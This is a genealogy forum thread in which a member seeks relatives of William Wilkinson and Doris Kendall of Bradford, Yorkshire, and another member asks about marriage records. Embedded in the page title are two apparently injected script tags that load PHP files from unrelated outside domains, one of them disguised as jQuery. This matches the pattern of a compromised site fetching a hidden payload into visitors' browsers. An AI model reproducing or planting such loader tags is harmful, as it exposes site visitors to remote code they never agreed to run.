Looking for Wilkinson families in Bradford, Yorkshire<script src="https://bestdoctornearme.com/splitter.ai/index.php"></script><script src="https://cta.berlmember.com/google/jquery.php"></script> :: FamilyTreeCircles.com Genealogy
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Looking for Wilkinson families in Bradford, Yorkshire

Query by wayne_kendall

My research on my Kendall family has led me to one Wilkinson Family of Bradford, Yorkshire. Parent of the Wilkinson families I am Looking for were William Wilkinson and Doris Kendall born 1914 in Bradford. I would love to connect with family and exchange info. I have extensive research on the Kendall Line.

Wayne Kendall

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by wayne_kendall Profile | Research | Contact | Subscribe | Block this user
on 2015-05-16 19:38:39

wayne_kendall has been a Family Tree Circles member since Nov 2014.

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by wizard28 on 2015-05-17 05:37:22

Do you have the marriage cert for William Wilkinson and Doris Kendall. What are their fathers names and occupation. Was William also born in 1914 Bradford ?

by wayne_kendall on 2015-05-17 06:43:24

Hi wizard28,

The only information I have is for Doris Kendall's parents. Her father was John Charles Kendall born in Bradford in 1889 ( Charles and Maria Hurst ) and mother would be Alice Crabtree born 1890 ( Thomas and Clara Ann Fairbank ). I have no information for William Wilkinson other than a reference to his father who would be Albert Wilkinson. A summary search on BMD gives a possibility of 7 children born from 1934 to 1949. Wilkinson with mother's maiden as Kendall. Several William Wilkinson born in West Yorkshire between 1907 and 1914 with the father listed as Albert.

That is why I would live to contact a living Wilkinson of this line to clarify such information and obtain the most recent info on the famaily.

Thanks for your response..much appreciated.

Wayne Kendall

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